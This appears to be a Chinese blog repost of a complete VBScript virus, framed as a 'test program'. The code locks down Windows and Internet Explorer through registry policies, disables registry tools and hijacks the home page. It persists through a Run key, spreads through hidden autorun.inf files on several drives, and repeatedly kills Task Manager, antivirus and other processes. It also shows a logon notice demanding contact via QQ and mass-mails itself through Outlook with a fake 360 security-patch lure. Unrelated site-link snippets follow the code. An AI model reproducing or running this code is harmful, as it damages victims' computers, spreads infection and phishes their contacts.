Vbs 测试程序一
转载请注明出处
有点小恶意哦!慎重测试
'This procedure is written in SeChaos, only for entertainment, not malicious communication, crack or rewrite.I am not liable, the final interpretation of all SeChaos.
dim fso,wsh,myfile,ws,pp,fsoFolder
set wsh=wscript.createobject("wscript.shell")
set fso=wscript.createobject("scripting.filesystemobject")
set myfile=fso.GetFile(wscript.scriptfullname)
'To modify the registry (start menu which things and the IE settings)
wsh.Regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Search Page","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Search_URL","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Default_Page_URL","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Default_Search_URL","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Search Page","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","c:\NYboy.vbs"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry",""
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\StartMenuLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWindowsUpdate",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
'The user can double-click on a hard disk, it can also be modified for so that it can not open file folder
wsh.Regwrite "HKLM\SOFTWARE\Classes\Drive\shell\auto\command\","C:\NYboy.bat '%1'"
wsh.Regwrite "HKCR\Drive\shell\","auto"
wsh.Regwrite "HKCR\Drive\shell\auto\command\","C:\NYboy.bat '%1'"
wsh.Regwrite "HKLM\SOFTWARE\Classes\Directory\shell\","auto"
wsh.Regwrite "HKCR\Directory\shell\auto\command\","C:\NYboy.bat '%1'"
wsh.Regwrite "HKLM\SOFTWARE\Classes\Directory\shell\auto\command\","C:\NYboy.bat '%1'"
'Modify default file Icon
wsh.Regwrite "HKCR\exefile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\txtfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\dllfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\batfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\inifile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\exefile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\txtfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\dllfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\batfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\inifile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","你好啊,Chaobs和你开个小小的玩笑"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","你已经中毒了,赶快杀毒或者与QQ5788*****联系"
'Copy itself to the C, D, E, F, U disk
myfile.copy "c:\"
myfile.copy "D:\"
myfile.copy "E:\"
myfile.copy "F:\"
myfile.copy "I:\"
myfile.attributes=34
'Define the Autorun.inf content that is U disk virus must be part of the code
If fso.FileExists("C:\autorun.inf") Then
Set objFolder = fso.GetFile("C:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>C:\autorun.inf"_
&"&& echo open=NYboy.bat >>C:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>C:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.bat>>C:\autorun.inf"_
&"&& echo shell=Auto>>C:\autorun.inf"_
&"&& attrib +h +s +r C:\autorun.inf"
set autobatc=fso.createtextfile("c:\NYboy.bat",1,ture)
autobatc.writeline("NYboy.vbs")
End If
If fso.FileExists("D:\autorun.inf") Then
Set objFolder = fso.GetFile("D:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>D:\autorun.inf"_
&"&& echo open=NYboy.bat >>D:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>D:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.bat>>D:\autorun.inf"_
&"&& echo shell=Auto>>D:\autorun.inf"_
&"&& attrib +h +s +r D:\autorun.inf"
set autobatd=fso.createtextfile("D:\NYboy.bat",1,ture)
autobatd.writeline("NYboy.vbs")
End If
If fso.FileExists("E:\autorun.inf") Then
Set objFolder = fso.GetFile("E:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>E:\autorun.inf"_
&"&& echo open=NYboy.bat >>E:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>E:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.bat>>E:\autorun.inf"_
&"&& echo shell=Auto>>E:\autorun.inf"_
&"&& attrib +h +s +r E:\autorun.inf"
set autobate=fso.createtextfile("E:\NYboy.bat",1,ture)
autobate.writeline("NYboy.vbs")
End If
If fso.FileExists("F:\autorun.inf") Then
Set objFolder = fso.GetFile("F:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>F:\autorun.inf"_
&"&& echo open=NYboy.bat >>F:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>F:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.bat>>F:\autorun.inf"_
&"&& echo shell=Auto>>F:\autorun.inf"_
&"&& attrib +h +s +r F:\autorun.inf"
set autobatf=fso.createtextfile("F:\NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
If fso.FileExists("I:\autorun.inf") Then
Set objFolder = fso.GetFile("I:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>I:\autorun.inf"_
&"&& echo open=NYboy.bat >>I:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>I:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.bat>>I:\autorun.inf"_
&"&& echo shell=Auto>>I:\autorun.inf"_
&"&& attrib +h +s +r I:\autorun.inf"
set autobatf=fso.createtextfile("I:\NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
'Set attributes for the system read only hidden virus body
wsh.run "cmd /c attrib +h +s +r C:\NYboy.bat"_
&"&& attrib +h +s +r D:\NYboy.bat"_
&"&& attrib +h +s +r E:\NYboy.bat"_
&"&& attrib +h +s +r F:\NYboy.bat"_
&"&& attrib +h +s +r I:\NYboy.bat"
'Mandatory end of certain processes, such as QQ, Notepad, webpage, batch file, carbachol, realplay process, after running to open these files
do
set ws=getobject("winmgmts:\\.\root\cimv2")
set pp=ws.execquery("select * from win32_process where name='taskmgr.exe'or Name = 'QQ.exe'or Name = 'notepad.exe'or Name = 'IEXPLORE.exe'or Name = 'cmd.exe'or Name = 'avp.exe'or Name = 'winRAR.exe'or Name = 'realplay.exe'or Name = 'WINWORD.exe'")
for each i in pp
i.terminate()
wscript.sleep 100
next
loop
'The virus can be spread by mail
Set ol=CreateObject("Outlook.Application")
On Error Resume Next
For x=1 To 5
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="360病毒测试"
Mail.Body="尊敬的用户您好:为了更好的服务用户,加强360病毒防范能力,特发此补丁,详细可在官网查询。具体测试请按随信附件进行,您可能需要关闭或阻止旧版360运行以便在线升级。谢谢合作 360研发中心"
Mail.Attachments.Add("c:\NYboy.vbs")
Mail.Send
Next
ol.Quit
Vbs 测试程序一的更多相关文章
- Vbs 测试程序三
一段被写滥了的VBS代码 值得一提的是感兴趣的同学可以把 chr(13) + chr(13) + chr(13) 改为chr(11) + chr(11) + chr(11) 不赘述 on error ...
- Vbs 测试程序二
这是一段原载于百度百科上的代码,Chaobs转载 原帖已删,就是怕有人用这个恶意程序. 慎用! dim folder,fso,foldername,f,d,dc set fso=createobjec ...
- Oracle使用ODBC连接配置
该配置是在windows 7 32位下进行的,程序已经通过了测试(使用VBS进行的测试) 1.文件下载 ------------------------------------------------ ...
- snip_opencv环境配置和测试程序
opencv2.4.9环境变量配置的记录. 2014年8月10日 Microsoft Windows XP [版本 5.1.2600](C) 版权所有 1985-2001 Microsoft Corp ...
- C#调用vbs脚本实现Windows版Siri
最近新加入,把自己一些有意思的小东西分享给大家,我是一个学生,代码写得少,哪里不规范,希望大家见谅. 这事我封装好的一个类,可以直接实例化对象之后,调用"对象.Talk()"方法, ...
- vbs连接sql server及写文件操作
此段代码是连接SQL SERVER的 代码内connMMSQL的参数要根据实际情况传入 Function connMMSQL(ip,user,pwd,database,strsql) Dim conn ...
- 在WinCC中通过VBS操作SQL Server2005
在项目中需要在一定条件满足时,保存一些数据到数据库中,并可根据条件查询.考虑到WinCC6.2以后采用的就是SQL Server2005数据库,所以直接利用该数据库即可,通过SQL Server Ma ...
- 使用vbs脚本进行批量编码转换
使用vbs脚本进行批量编码转换 最近需要使用SourceInsight查看分析在Linux系统下开发的项目代码,我们知道Linux系统中文本文件默认编码格式是UTF-8,而Windows中文系统中的默 ...
- Spring+SpringMvc+Mybatis框架集成搭建教程三(框架整合测试程序开发)
框架整合测试程序开发 (1).在mysql数据库中创建t_user表,sql语句如下 CREATE TABLE `t_user` ( `id` bigint(20) NOT NULL AUTO_INC ...
随机推荐
- 验证tensorflow版本是GPU还是CPU
reference: https://blog.csdn.net/zlase/article/details/79261348 import numpy import tensorflow as tf ...
- Google Java编程风格指南(转)
目录 前言 源文件基础 源文件结构 格式 命名约定 编程实践 Javadoc 后记 前言 这份文档是Google Java编程风格规范的完整定义.当且仅当一个Java源文件符合此文档中的规则, 我们才 ...
- Poj(2236),简单并查集
题目链接:http://poj.org/problem?id=2236 思路很简单,傻逼的我输出写成了FALL,然后遍历的时候for循环写错了,还好很快我就Debug出来了. #include < ...
- 第33章 TIM—电容按键检测—零死角玩转STM32-F429系列
第33章 TIM—电容按键检测 全套200集视频教程和1000页PDF教程请到秉火论坛下载:www.firebbs.cn 野火视频教程优酷观看网址:http://i.youku.com/fir ...
- iOS第三方开放者平台概览
前言:记录一些可能用到过的第三方开放者平台相关内容 视频类: 腾讯云移动直播:https://cloud.tencent.com/product/mlvb 遇到问题后发起工单是一种比较好的解决问题的方 ...
- python配置日志的几种方式
使用的是logging模块,关于logging模块内容,可以看我的另一篇博客:https://www.cnblogs.com/kuxingseng95/p/9464347.html 作为开发者,我们一 ...
- WebAppBuilder独立于Portal之arcgis for js应用框架研究
1.前言 最近在做项目过程中,用到了WAB,先做一下总结和归类.Webappbuilder(简称WAB)是运行在portal或者online的一款webGIS开发应用程序,其代码开源并且具有优秀的设计 ...
- 牛客小白月赛2 D 虚虚实实 【欧拉图】【连通图】
链接:https://www.nowcoder.com/acm/contest/86/D来源:牛客网 题目描述 震为雷,临危不乱,亨通畅达:巽为风,柔顺伸展,厚载万物. 震卦:洊雷,震,君子以恐惧修省 ...
- P2661 信息传递 DFS
题目链接:洛谷 P2661 信息传递 一个人要想知道自己的生日,就意味着信息的传递是成环的,因为每轮信息只能传递一个人,传递的轮数就等于环的大小 环的大小就等于环中的两个点到第三个点的距离之和加一,我 ...
- 【清真dp】cf1144G. Two Merged Sequences
成就:赛后在cf使用错误的贪心通过一题 成就:在cf上赛后提交hack数据 成就:在cf上赛后hack自己 题目大意 有一长度$n \le 2\times 10^5$的序列,要求判断是否能够划分为一个 ...